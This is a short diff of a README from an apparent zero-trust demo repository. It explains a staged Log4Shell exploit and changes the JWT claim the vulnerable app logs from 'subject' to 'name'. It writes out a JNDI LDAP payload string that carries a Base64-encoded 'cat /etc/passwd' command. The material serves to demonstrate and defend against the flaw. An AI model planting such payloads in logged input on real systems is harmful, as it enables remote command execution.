tetratelabs/zta-demo-2022/README.md

 The current implementation of the exploit reads malicious LDAP lookup strings and parses a Base64-encoded command that is then executed.
 For example, the malicious string `"${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}"` will instruct the exploit to execute a `cat /etc/passwd` command.
-The vulnerable application logs the value of the `subject` claim in a JWT token, so if the malicious payload is set there, the exploit will be triggered.
+The vulnerable application logs the value of the `name` claim in a JWT token, so if the malicious payload is set there, the exploit will be triggered.

 ### Running applications locally